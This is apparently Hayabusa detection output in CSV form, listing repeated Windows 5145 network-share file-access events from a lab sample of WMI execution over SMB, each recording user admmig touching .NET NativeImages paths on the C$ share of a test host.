2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
